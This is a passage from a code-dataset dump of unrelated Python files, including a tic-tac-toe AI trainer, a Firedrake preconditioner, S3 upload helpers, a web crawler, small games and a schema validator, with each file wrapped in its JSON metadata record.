str(datetime.datetime.now().strftime(\"%d-%m-%Y_%H%M%S\"))\n browser.save_screenshot(f'./screenshots/{date}_{request.function.__name__}.png')\n allure.attach(browser.get_screenshot_as_png(),\n name=request.function.__name__,\n attachment_type=allure.attachment_type.PNG)\n finally:\n pass\n\n with allure.step('Закрываем браузер'):\n browser.quit()\n","sub_path":"conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":3334,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"162640032","text":"import click\n\nfrom game import play, simulate\nfrom players import ConsolePlayer, MiniMaxPlayer, NNPlayer, ReinforcementPlayer, RandomPlayer, MiniMaxPlayerNN, \\\n MiniMaxPlayerNN2\nfrom tictactoe_state import 
TicTacToeState\n\n\n@click.command('connect4')\n@click.option('--simulations', '-s',\n default=5000,\n help='How many plays to simulate for training.')\n@click.option('--mode', '-m',\n default='reinforcement',\n type=click.Choice(['console', 'window', 'simulation', 'reinforcement']),\n help='Starts game in a terminal or a window.')\n@click.option('--ai-player', '-p',\n default='cnn2',\n type=click.Choice(['nn', 'minimax', 'cnn', 'cnn2']),\n help='Type of ai player')\n@click.option('--epochs', '-e',\n default=3,\n help='Number of epochs to train. (only for ai-player=nn)')\n@click.option('--lookahead', '-l',\n default=1,\n help='Lookahead depth for the minimax algorithm.'\n ' (only for ai-player=minimax)')\ndef tictactoe(simulations, mode, ai_player, epochs, lookahead):\n state = TicTacToeState()\n\n if ai_player == 'nn':\n from tictactoe_model import TicTacToeModel\n model = TicTacToeModel()\n plays = simulate(state, simulations)\n model.train(plays, epochs=epochs)\n autoplayer = NNPlayer(model, 'DNN')\n elif ai_player == 'cnn':\n from tictactoe_model_cnn import TicTacToeModelCnn\n model = TicTacToeModelCnn()\n plays = simulate(state, simulations)\n model.train(plays, epochs=epochs)\n autoplayer = NNPlayer(model, 'CNN')\n elif ai_player == 'cnn2':\n from tictactoe_model_cnn2 import TicTacToeModelCnn2\n model = TicTacToeModelCnn2()\n plays = simulate(state, simulations, player1=RandomPlayer(), player2=RandomPlayer())\n model.train(plays, epochs=epochs)\n autoplayer = ReinforcementPlayer(model, 'CNN2')\n else:\n autoplayer = MiniMaxPlayer(lookahead=lookahead)\n\n if mode == 'console':\n states, _ = play(state, ConsolePlayer(), autoplayer)\n print(states[-1].state)\n elif mode == 'simulation':\n player1 = autoplayer\n\n # from tictactoe_model_cnn import TicTacToeModelCnn\n # cnn_model = TicTacToeModelCnn()\n # cnn_plays = simulate(state, simulations)\n # cnn_model.train(cnn_plays, epochs=epochs)\n # player2 = NNPlayer(cnn_model, 'CNN')\n player2 = RandomPlayer()\n\n plays = simulate(state, 50, player1=player1, player2=player2)\n player1_wins, player2_wins, draws = game_statistics(plays)\n\n plays = simulate(state, 50, player1=player2, player2=player1)\n p2, p1, d = game_statistics(plays)\n player1_wins += p1\n player2_wins += p2\n draws += d\n\n print(f'{player1} vs. 
{player2}')\n print(f'{player1} wins: {player1_wins}')\n print(f'{player2} wins: {player2_wins}')\n print(f'Draws: {draws}')\n elif mode == 'reinforcement':\n # initial training with random plays (not really necessary)\n from tictactoe_model import TicTacToeModel\n model = TicTacToeModel()\n plays = simulate(state, simulations, player1=RandomPlayer(), player2=RandomPlayer())\n model.train(plays, epochs=epochs)\n nnplayer = NNPlayer(model, 'DNN')\n autoplayer = MiniMaxPlayer(1)\n\n player1 = autoplayer\n # player2 = RandomPlayer()\n\n for _ in range(10):\n # training through self-play\n # plays = simulate(state, 100, player1=player1, player2=player1)\n # print_game(plays[0])\n # print_game(plays[1])\n # model.train(plays, epochs=epochs)\n\n # benchmark vs random\n duel_random_tictactoe(player1)\n\n else:\n from tictactoe_window import TicTacToeWindow\n state = TicTacToeState()\n state = state.move(autoplayer.next_action(state))\n TicTacToeWindow(autoplayer=autoplayer, state=state).show()\n\n\ndef duel_random_tictactoe(player1):\n player2 = MiniMaxPlayer(2)\n state = TicTacToeState()\n duel(player1, player2, state)\n\n\ndef duel(player1, player2, state):\n plays = simulate(state, 50, player1=player1, player2=player2)\n print_game(plays[0])\n\n player1_wins, player2_wins, draws = game_statistics(plays)\n plays = simulate(state, 50, player1=player2, player2=player1)\n print_game(plays[0])\n\n p2, p1, d = game_statistics(plays)\n player1_wins += p1\n player2_wins += p2\n draws += d\n print(f'{player1} vs. {player2}')\n print(f'{player1} wins: {player1_wins}')\n print(f'{player2} wins: {player2_wins}')\n print(f'Draws: {draws}')\n\n\ndef game_statistics(plays):\n player1_wins = [p[1] for p in plays].count(1)\n player2_wins = [p[1] for p in plays].count(-1)\n draws = [p[1] for p in plays].count(0)\n\n return player1_wins, player2_wins, draws\n\n\ndef print_game(play):\n for state in play[0]:\n print(state, end=', ')\n print()\n\n\nif __name__ == '__main__':\n tictactoe()\n","sub_path":"tictactoe.py","file_name":"tictactoe.py","file_ext":"py","file_size_in_byte":5076,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"91596412","text":"\"\"\"\nThis is a test example of configuration file for CRAB-3 client\n\"\"\"\n\nfrom WMCore.Configuration import Configuration\n\nconfig = Configuration()\n\n## General options for the client\nconfig.section_(\"General\")\nconfig.General.standalone = True\n\n#\n# To enable direct submission, uncomment the below and turn\n# config.General.enableGsissh to false.\n#\n# config.General.condorPool = \"glidein.unl.edu\"\n# config.General.condorScheddList = [\"glidein.unl.edu\"]\n#\n\nconfig.General.enableGsissh = True\nconfig.section_(\"BossAir\")\nconfig.BossAir.remoteUserHost = \"submit-5.t2.ucsd.edu\"\n\nconfig.General.requestName = 'bbockelm_crab3_2'\nconfig.General.serverUrl = 'cmsweb.cern.ch'\n\n## Specific option of the job type\nconfig.section_(\"JobType\")\nconfig.JobType.pluginName = 'Analysis'\nconfig.JobType.psetName = 'pset.py'\n\n## Specific data options\nconfig.section_(\"Data\")\nconfig.Data.inputDataset = '/GenericTTbar/HC-CMSSW_5_3_1_START53_V5-v1/GEN-SIM-RECO'\nconfig.Data.publishDataName = 'crab_bbockelm_3'\nconfig.Data.unitsPerJob = 50\n\n## User options\nconfig.section_(\"User\")\nconfig.User.email = ''\n\nconfig.section_(\"Site\")\nconfig.Site.storageSite = 
'T2_US_Nebraska'\n","sub_path":"example/crabConfig.py","file_name":"crabConfig.py","file_ext":"py","file_size_in_byte":1150,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"420657260","text":"import os\nimport sys\nfrom PyQt5 import QtWidgets\n\ndef load_ressources():\n    if os.path.isfile(r\"ressources/ressources.qrc\"):\n        os.system(r\"pyrcc5 ressources/ressources.qrc -o ressources/ressources.py\")\n\n\nif __name__ == \"__main__\":\n    APP = 0\n    if QtWidgets.QApplication.instance():\n        APP = QtWidgets.QApplication.instance()\n    else:\n        APP = QtWidgets.QApplication(sys.argv)\n    APP.setStyle('fusion')\n    if True:\n        load_ressources()\n    if True:\n        from src.gui import GUI\n        window = GUI()\n        window.show()\n\n    #if APP:\n    #    sys.exit(APP.quit())\n    sys.exit(APP.exec_())","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":634,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"169460612","text":"# -*- coding:utf-8 -*-\r\n\r\n# Image binarization\r\nfrom PIL import Image\r\n\r\nimg = Image.open('test2.jpg')\r\n\r\n# Mode 'L' is a grayscale image: each pixel is stored in 8 bits, with 0 for black, 255 for white, and other values for intermediate shades of gray.\r\nImg = img.convert('L')\r\nImg.save(\"testA.jpg\")\r\n\r\n# Custom grayscale threshold: pixels below this value become black, all others become white\r\nthreshold = 180\r\n\r\ntable = []\r\nfor i in range(256):\r\n    if i < threshold:\r\n        table.append(0)\r\n    else:\r\n        table.append(1)\r\n\r\n# Binarize the image\r\nphoto = Img.point(table, '1')\r\nphoto.save(\"testB.jpg\")\r\n","sub_path":"BlankW.py","file_name":"BlankW.py","file_ext":"py","file_size_in_byte":578,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"527300433","text":"from xlrd import open_workbook\n\nclass Company(object):\n    def __init__(self, id, comp_name, comp_industry, comp_year, address, address2, phone):\n        self.id = id\n        self.comp_name = comp_name\n        self.comp_industry = comp_industry\n        self.comp_year = comp_year\n        self.address = address\n        self.address2 = address2\n        self.phone = phone\n\n    def __str__(self):\n        return(\"Company object:\\n\"\n               \"  No. 
= {0}\\n\"\n \" 병역지정업체명 = {1}\\n\"\n \" 업종구분 = {2}\\n\"\n \" 기업규모 = {3}\\n\"\n \" 선정년도 = {4} \\n\"\n \" 소재지 = {5}\"\n \" 세부주소 = {6}\"\n \" 전화번호 = {7}\"\n .format(self.id, self.comp_name, self.comp_industry,\n self.comp_year, self.address, self.address2, self.phone))\n\nwb = open_workbook('C:\\\\Users\\\\Joon\\\\Documents\\\\GitHub\\\\sortsort\\\\sort.xlsx')\nfor sheet in wb.sheets():\n number_of_rows = sheet.nrows\n number_of_columns = sheet.ncols\n\n items = []\n\n rows = []\n for row in range(0, number_of_rows):\n values = []\n for col in range(number_of_columns):\n value = (sheet.cell(row,col).value)\n try:\n value = str(int(value))\n except ValueError:\n pass\n finally:\n values.append(value)\n item = Company(*values)\n items.append(item)\n\n\n\ndef searchbyAddress():\n a = input(\"주소: \")\n for item in items:\n dodo = item.address\n dodo1 = dodo.split()\n if dodo1[2] == a:\n print (item.comp_name + \" \" + item.address)\n #print (item.comp_name)\n #print (\"{0} {1} {2}\".format(item.comp_name,item.address,item.address2))\n\ndef searchbyName():\n a = input(\"회사명: \")\n for item in items:\n dodo = item.comp_name\n if dodo == a:\n print (item.comp_industry + \" \" + item.address + \" \" + item.address2)\n\ndef searchbyState():\n a = input(\"구 이름: \")\n for item in items:\n dodo = item.address\n dodo1 = dodo.split()\n if dodo1[1] == a:\n print (item.comp_industry + \" \" + item.comp_name + \" \" + item.address)\n print ()\n\ndef writeHTML():\n htmlfile = open(\"C:\\\\Users\\\\Joon\\\\Documents\\\\GitHub\\\\sortsort\\\\html.txt\", 'a')\n for item in items:\n htmlfile.write(\"\" + item.comp_name + \"\" + item.comp_industry + \"\" + item.comp_year + \"\" + item.address + \" \" + item.address2 + \"\" + item.phone + \"\\n\")\n\n\n htmlfile.close()\n\nwriteHTML()\n","sub_path":"sorting.py","file_name":"sorting.py","file_ext":"py","file_size_in_byte":2756,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"17457495","text":"from firedrake.preconditioners.base import PCBase\nfrom firedrake.petsc import PETSc\nimport copy\nfrom firedrake import Function\nfrom firedrake import*\n\nclass PCD(PCBase):\n\n needs_python_pmat = True\n\n def initialize(self, pc):\n from firedrake import TrialFunction, TestFunction, Function, DirichletBC, dx, \\\n Mesh, inner, grad, split, Constant, parameters\n from firedrake.assemble import allocate_matrix, create_assembly_callable\n prefix = pc.getOptionsPrefix() + \"pcd_\"\n\n _, P = pc.getOperators()\n context = P.getPythonContext()\n\n test, trial = context.a.arguments()\n\n Q = test.function_space()\n\n self.Q = Q\n\n p = TrialFunction(Q)\n q = TestFunction(Q)\n\n nu = context.appctx.get(\"nu\", 1.0)\n self.nu = nu\n\n mass = Constant(1.0/self.nu)*p*q*dx\n\n stiffness = inner(grad(p), grad(q))*dx\n \n state = context.appctx[\"state\"]\n\n velid = context.appctx[\"velocity_space\"]\n\n opts = PETSc.Options()\n \n default = parameters[\"default_matrix_type\"]\n Mp_mat_type = opts.getString(prefix+\"Mp_mat_type\", default)\n Kp_mat_type = opts.getString(prefix+\"Kp_mat_type\", default)\n self.Fp_mat_type = opts.getString(prefix+\"Fp_mat_type\", \"matfree\")\n\n Mp = assemble(mass, form_compiler_parameters=context.fc_params,\n mat_type=Mp_mat_type,\n options_prefix=prefix + \"Mp_\")\n \n \n Kp = assemble(stiffness, form_compiler_parameters=context.fc_params,\n mat_type=Kp_mat_type,\n options_prefix=prefix + \"Kp_\")\n\n\n Mksp = PETSc.KSP().create(comm=pc.comm)\n Mksp.incrementTabLevel(1, parent=pc)\n 
Mksp.setOptionsPrefix(prefix + \"Mp_\")\n Mksp.setOperators(Mp.petscmat)\n Mksp.setUp()\n Mksp.setFromOptions()\n self.Mksp = Mksp\n\n Kksp = PETSc.KSP().create(comm=pc.comm)\n Kksp.incrementTabLevel(1, parent=pc)\n Kksp.setOptionsPrefix(prefix + \"Kp_\")\n Kksp.setOperators(Kp.petscmat)\n Kksp.setUp()\n Kksp.setFromOptions()\n self.Kksp = Kksp\n \n u0 = split(state)[velid]\n fp = Constant(self.nu)*inner(grad(p), grad(q))*dx + inner(u0, grad(p))*q*dx\n\n self.Fp = allocate_matrix(fp, form_compiler_parameters=context.fc_params,\n mat_type=self.Fp_mat_type,\n options_prefix=prefix + \"Fp_\")\n\n self._assemble_Fp = create_assembly_callable(fp, tensor=self.Fp,\n form_compiler_parameters=context.fc_params,\n mat_type=self.Fp_mat_type)\n self._assemble_Fp()\n\n Fpmat = self.Fp.petscmat\n self.workspace = [Fpmat.createVecLeft() for i in (0, 1)]\n self.tmp = Function(self.Q)\n \n def update(self, pc):\n self._assemble_Fp()\n\n\n def apply(self, pc, x, y):\n a, b = self.workspace\n \n self.Mksp.solve(x, y)\n y.copy(a)\n\n self.Fp.petscmat.mult(a, b)\n \n self.Kksp.solve(b, a)\n\n y.axpy(1.0, a)\n y.scale(-1.0)\n\n def applyTranspose(self, pc, x, y):\n pass\n","sub_path":"Lid_driven_cavity/steady/2D/FPCD.py","file_name":"FPCD.py","file_ext":"py","file_size_in_byte":3276,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"369477316","text":"#!/usr/bin/env python\n\n# The Expat License\n#\n# Copyright (c) 2017, Shlomi Fish\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\nimport sys\nfrom six import print_\n# import functools\n\nif sys.version_info > (3,):\n    long = int\n    xrange = range\n\nc = [[0], [1]]\n\n\ndef E(x, y):\n    if y <= 1:\n        return y\n    if y <= 3000:\n        return c[y][x % y]\n    return 1 + E(y, x % y)\n\n\nfor y in xrange(2, 3001):\n    c.append([])\n    arr = c[y]\n    for m in xrange(y):\n        arr.append(E(y, m)+1)\n\n\n# @functools.lru_cache(maxsize=128*1024)\ndef R(x, y):\n    return 1+G(y, x % y)\n\n\ndef G(x, y):\n    if y <= 1:\n        return y\n    return R(x, y)\n\n\ndef S(n):\n    ret = 0\n    # For x == y\n    ret += n\n    for x in xrange(1, n+1):\n        mods = [0, 1]\n        for m in xrange(1, x):\n            mods.append(mods[-1] + 1 + E(x, m))\n        print_(\"x = %d ; m1 = %d ; m0 = %d\" % (x, mods[-1], mods[-1]-x))\n        max_ = n - n % x\n        t = max_ // x - 1\n        delta = t*((mods[-1] << 1))+((mods[n-max_+1]-1) << 1)+n-x\n        ret += delta\n        if ((x & 0x3FF) == 0):\n            print_(\"x = %d ; ret = %d\" % (x, ret))\n            sys.stdout.flush()\n        if False:\n            d = 0\n            for y in xrange(x+1, n+1):\n                d += E(x, y) + E(y, x)\n            print_(\"x = %d ; d = %d ; delta = %d\" % (x, d, delta))\n    print_(\"n = %d ; ret = %d\" % (n, ret))\n    return ret\n\n# if False:\n#     d = 0\n#     for x in xrange(y+1, n+1):\n#         d += E(x, y) + E(y, x)\n#     print_(\"y = %d ; d = %d ; delta = %d\" % (y, d, delta))\n\n\ndef main():\n    S(10)\n    S(100)\n    S(5000000)\n\n\nmain()\n","sub_path":"project-euler/433/euler_433_v3.py","file_name":"euler_433_v3.py","file_ext":"py","file_size_in_byte":2638,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"198003599","text":"import random\r\n\r\ndef choose():\r\n    words=['Computer','Rainbow','Science','Programming','player']\r\n    pick=random.choice(words)\r\n    return pick\r\n\r\ndef jumble(word):\r\n    jumbled=\"\".join(random.sample(word,len(word)))\r\n    return jumbled\r\n\r\ndef thank(p1n,p2n,p1,p2):\r\n    print(p1n,\"Your score is\",p1)\r\n    print(p2n,\"your score is\",p2)\r\n    print(\"Have a nice day\")\r\n\r\ndef play():\r\n    p1name=input(\"Enter the name 1\")\r\n    p2name=input(\"Enter the name 2 \")\r\n    pp1=0\r\n    pp2=0\r\n    turn=0\r\n    while(1):\r\n        picked_word=choose()\r\n        qn=jumble(picked_word)\r\n        print(qn)\r\n        if turn%2==0:\r\n            print(p1name,\"This is your turn\")\r\n            ans=input(\"Whats on my mind?\")\r\n            if ans==picked_word:\r\n                pp1=pp1+1\r\n                print(pp1,\"is your score\")\r\n            else:\r\n                print(\"Better luck next time,I thought the word :\",picked_word)\r\n            c=input(\"Do you want to continue\")\r\n            if c=='0':\r\n                thank(p1name,p2name,pp1,pp2)\r\n                break\r\n        else:\r\n            print(p2name,\"This is your turn\")\r\n            ans = input(\"Whats on my mind?\")\r\n            if ans == picked_word:\r\n                pp2 = pp2 + 1\r\n                print(pp2, \"is your score\")\r\n            else:\r\n                print(\"Better luck next time,I thought the word :\", picked_word)\r\n            c = input(\"Do you want to continue\")\r\n            if c == '0':\r\n                thank(p1name, p2name, pp1, pp2)\r\n                break\r\n        turn=turn+1\r\nplay()\r\n","sub_path":"guesstheword.py","file_name":"guesstheword.py","file_ext":"py","file_size_in_byte":1605,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"112096962","text":"import numpy as np\nfrom nltk.tokenize import wordpunct_tokenize\nfrom collections import Counter\nimport os \n\n## Take a directory as input, read all files in it and tokenize the text corpus\n\n\n\ndef tokenize(directory,exclude_files):\n\tfull_content = ''\n\tfor _file in 
os.listdir(directory):\n\t\t#disp_count = 5\n\t\tif exclude_files and (_file in exclude_files):\n\t\t\tcontinue\n\t\twith open(directory+_file,'r') as f:\n\t\t\tcontents = f.readlines()\n\t\t\tfor item in contents:\n\t\t\t\ttry:\n\t\t\t\t\tsentence = item.split('\\t')[1].strip()\n\t\t\t\t\tfull_content += sentence\n\t\t\t\texcept IndexError:\n\t\t\t\t\tcontinue\n\t\t\t\t# if np.random.binomial(1,0.1):\n\n\t\t\t\t# \tprint sentence\n\t\t\t\t# \ttime.sleep(2)\t\t\t\t\n\t\t\t\t# \tdisp_count -=1 \n\t\t\t\t# \tif not disp_count:\n\t\t\t\t# \t\tprint '*'*100\n\t\t\t\t# \t\tbreak\n\t\t\t\t\t\t\n\t\t\t\t# else:\n\t\t\t\t# \tprint '#'\n\n\treturn wordpunct_tokenize(full_content.lower())","sub_path":"tokenized_text.py","file_name":"tokenized_text.py","file_ext":"py","file_size_in_byte":832,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"242192066","text":"\"\"\"Asignacion URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n    https://docs.djangoproject.com/en/1.11/topics/http/urls/\nExamples:\nFunction views\n    1. Add an import: from my_app import views\n    2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')\nClass-based views\n    1. Add an import: from other_app.views import Home\n    2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')\nIncluding another URLconf\n    1. Import the include() function: from django.conf.urls import url, include\n    2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))\n\"\"\"\nfrom django.conf.urls import url, include\nfrom django.contrib import admin\n\nurlpatterns = [\n    url(r'^admin/', admin.site.urls),\n    #url(r'^',include('apps.Login.urls', namespace = 'login')),\n    url(r'^colegio/', include('apps.Colegio.urls', namespace = 'colegio')),\n    url(r'^curso/',include('apps.Curso.urls', namespace = 'curso')),\n    url(r'^profesor/',include('apps.Profesor.urls', namespace = 'profesor')),\n    url(r'^horario/',include('apps.Horario.urls', namespace = 'horario')),\n\n]\n","sub_path":"Asignacion/Asignacion/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1139,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"430920829","text":"import urllib.request as request\nimport urllib\nfrom collections import deque\nimport re\n\nqueue = deque()\nvisited = set()\n\nurl = 'https://yande.re/post'\n\nqueue.append(url)\ncount = 1\n\nwhile queue:\n    url = queue.popleft()\n    visited |= {url}\n    print('正在抓取第' + str(count) + '个页面。')\n    count += 1\n\n    try:\n        response = request.urlopen(url, timeout = 2)\n    except:\n        continue\n    \n    if 'html' not in response.getheader('Content-Type'):\n        continue\n\n    try:\n        data = response.read().decode('UTF-8')\n    except:\n        continue\n\n    link = re.compile('href=\\\"(.+?)\\\"')\n    for href in link.findall(data):\n        if 'http' in href and href not in visited:\n            queue.append(href)\n            print(href + ' ---> 加入待下载队列')\n    \n\n\n\n\n\n","sub_path":"pic_crawler/post_test.py","file_name":"post_test.py","file_ext":"py","file_size_in_byte":800,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"506511179","text":"import os_setup\nimport logging\nimport boto3\nfrom botocore.exceptions import ClientError\nimport requests\nimport shutil\nfrom botocore.client import Config\nimport os\n\nAWS_ACCESS_KEY = os.environ.get('AWS_ACCESS_KEY_ID')\nAWS_SECRET_ACCESS_KEY = os.environ.get('AWS_SECRET_ACCESS_KEY')\n\n\ndef create_presigned_url(bucket_name, 
object_name, expiration=6048000):\n    \"\"\"Generate a presigned URL to share an S3 object\n\n    :param bucket_name: string\n    :param object_name: string\n    :param expiration: Time in seconds for the presigned URL to remain valid\n    :return: Presigned URL as string. If error, returns None.\n    \"\"\"\n\n    # Generate a presigned URL for the S3 object\n    s3_client = boto3.client('s3', aws_access_key_id=AWS_ACCESS_KEY,\n                             aws_secret_access_key=AWS_SECRET_ACCESS_KEY)\n    try:\n        response = s3_client.generate_presigned_url('get_object',\n                                                    Params={'Bucket': bucket_name,\n                                                            'Key': object_name},\n                                                    ExpiresIn=expiration)\n    except ClientError as e:\n        logging.error(e)\n        return None\n\n    # The response contains the presigned URL\n    return response\n\n\ndef upload_file(file_name, bucket, store_name='ETC', object_name='no-name.mp4'):\n    \"\"\"Upload a file to an S3 bucket\n\n    :param file_name: File to upload\n    :param bucket: Bucket to upload to\n    :param object_name: S3 object name. If not specified then file_name is used\n    :return: True if file was uploaded, else False\n    \"\"\"\n\n    # If S3 object_name was not specified, use file_name\n    if object_name is None:\n        object_name = file_name\n\n    # Upload the file\n    s3_client = boto3.client('s3', aws_access_key_id=AWS_ACCESS_KEY,\n                             aws_secret_access_key=AWS_SECRET_ACCESS_KEY)\n    try:\n        response = s3_client.upload_file(file_name, bucket, '{media}/{video}/{store}/{file_name}'.format(\n            media='media', video='video', store=store_name, file_name=object_name))\n    except ClientError as e:\n        logging.error(e)\n        return False\n    return True\n\n\ndef resize_in_ratio(image_source, max_width_and_height, resize_source, quality=95):\n    from PIL import Image\n    response = requests.get(image_source, stream=True)\n    file_root = './crawling/temp/temp.jpg'\n    with open(file_root, 'wb') as out_file:\n        shutil.copyfileobj(response.raw, out_file)\n    data = Image.open(file_root)\n    source_width, source_height = data.size\n    if source_width > source_height:\n        result_ratio = source_width / max_width_and_height\n        result_width = int(source_width / result_ratio)\n        result_height = int(source_height / result_ratio)\n    else:\n        result_ratio = source_height / max_width_and_height\n        result_width = int(source_width / result_ratio)\n        result_height = int(source_height / result_ratio)\n    result_data = data.resize((result_width, result_height))\n    result_data.save(resize_source, 'JPEG', quality=quality)\n    print(os.path.getsize(file_root), os.path.getsize(resize_source), '{}% 압축'.format(\n        int((1 - os.path.getsize(resize_source)/os.path.getsize(file_root))*100)))\n    os.remove(file_root)\n\n\ndef upload_to_s3(file_root, upload_root):\n    s3_client = boto3.client('s3', aws_access_key_id=AWS_ACCESS_KEY,\n                             aws_secret_access_key=AWS_SECRET_ACCESS_KEY,\n                             config=Config(signature_version='s3v4'))\n    with open(file_root, 'rb') as f:\n        s3_client.upload_fileobj(f, 'wachu', upload_root)\n    video_source = \"https://s3.console.aws.amazon.com/s3/object/wachu/\"+upload_root\n    video_source = create_presigned_url(\n        'wachu', upload_root, expiration=6048000)\n","sub_path":"app/crawling/helper/image_processing.py","file_name":"image_processing.py","file_ext":"py","file_size_in_byte":3658,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"499432041","text":"# Exercise 6\n###############\n\n# Using keys and indexing, grab the 'hello' from the following dictionaries:\nd1 = {'simple_key': 'hello'}\n\nd2 = {'k1': {'k2': 'hello'}}\n\nd3 = {'k1': [{'nest_key': ['this is deep', 
['hello']]}]}\n\nd1.get('simple_key')\nd2['k1']['k2']\nd3['k1'][0]['nest_key'][1]\n\n","sub_path":"nested.py","file_name":"nested.py","file_ext":"py","file_size_in_byte":289,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"210558025","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport random as r\n\n#r.seed(123)\ntraining_data={'inp':[[1,1,1],[0,1,1],[1,0,1],[0,0,1]],'out':[1,1,0,0]}\nw1= r.randint(-10,10)\nw2= r.randint(-10,10)\nweights=[w1,w2,1]\nw_=[]\ny_=[]\nprint(training_data)\nprint('hi')\nprint(weights)\n\nfor i in range(0,4):\n calc=0\n for j in range(0,3):\n calc=calc+training_data['inp'][i][j]*weights[j]\n if calc>0:\n y_.append(1)\n else:\n y_.append(-1)\n\nfor i in range(0,10000):\n print('y_::'+str(y_))\n e=0\n for j in range(0,4):\n e=e+(training_data['out'][j]-y_[j])**2\n e=e**0.5\n print(e)\n j=r.randint(0,3)\n t=training_data['out'][j]\n print(str(t)+'+'+str(j))\n if t==y_[j]:\n pass\n else:\n w_=[]\n for k in range(0,3):\n w_.append(weights[k]+training_data['out'][j]*training_data['inp'][j][k])\n weights=w_\n print(weights)\n y_=[]\n for k in range(0,4):\n calc=0\n for j in range(0,3):\n calc=calc+training_data['inp'][k][j]*weights[j]\n if calc>0:\n #print('1')\n y_.append(1)\n else:\n #print('-1')\n y_.append(-1)\n #print('end')","sub_path":"perceptron.py","file_name":"perceptron.py","file_ext":"py","file_size_in_byte":1193,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"249607693","text":"\"\"\"\nValidate everything in this repo, such as syntax, structure, etc.\n\"\"\"\nimport sys\nimport os\nimport glob\nimport yaml\nimport jsonschema\nimport requests\nimport json\nfrom jsonschema.exceptions import ValidationError\n\nfrom test.helpers import get_config, wait_for_arangodb\n\n_CONF = get_config()\n\n# JSON schema for vertex and edge collection schemas found in /schema\nschema_schema = {\n \"type\": \"object\",\n \"required\": [\"name\", \"type\", \"schema\"],\n \"properties\": {\n \"name\": {\n 'title': 'Collection name',\n \"type\": \"string\",\n \"format\": r'^[a-z_]+$'\n },\n 'type': {\n 'type': 'string',\n 'enum': ['vertex', 'edge']\n },\n 'schema': {'type': 'object'}\n }\n}\n\n\ndef validate_json_schemas():\n \"\"\"Validate the syntax of all the JSON schemas.\"\"\"\n print('Validating JSON schemas..')\n names = set() # type: set\n for path in glob.iglob('schemas/**/*.yaml', recursive=True):\n name = os.path.basename(path)\n print(f' validating {path}..')\n with open(path) as fd:\n data = yaml.safe_load(fd)\n jsonschema.validate(data, schema_schema)\n # Check for any duplicate schema names\n if name in names:\n _fatal('Duplicate schemas for name ' + name)\n else:\n names.add(name)\n # Make sure it can be used as a JSON schema\n # If the schema is invalid, a SchemaError will get raised\n # Otherwise, the schema will work and a ValidationError will get raised (what we want)\n try:\n jsonschema.validate({}, data['schema'])\n except ValidationError:\n pass\n except Exception as err:\n print('=' * 80)\n print('Unable to load schema in ' + path)\n print(str(err))\n exit(1)\n # All schemas must be object types\n if data['schema']['type'] != 'object':\n _fatal('Schemas must be an object. Schema in %s is not an object.' 
% path)\n required = data['schema'].get('required', [])\n # Edges must require _from and _to while vertices must require _key\n has_edge_fields = ('_from' in required and '_to' in required)\n has_delta_edge_fields = ('from' in required and 'to' in required)\n if data['type'] == 'edge' and data.get('delta') and not has_delta_edge_fields:\n _fatal('Time-travel edge schemas must require \"from\" and \"to\" attributes in ' + path)\n elif data['type'] == 'edge' and not data.get('delta') and not has_edge_fields:\n _fatal('Edge schemas must require \"_from\" and \"_to\" attributes in ' + path)\n elif data['type'] == 'vertex' and data.get('delta') and 'id' not in required:\n _fatal('Time-travel vertex schemas must require the \"id\" attribute in ' + path)\n elif data['type'] == 'vertex' and not data.get('delta') and '_key' not in required:\n _fatal('Vertex schemas must require the \"_key\" attribute in ' + path)\n print(f'✓ {name} is valid.')\n print('..all valid.')\n\n\nstored_query_schema = {\n 'type': 'object',\n 'required': ['query', 'name'],\n 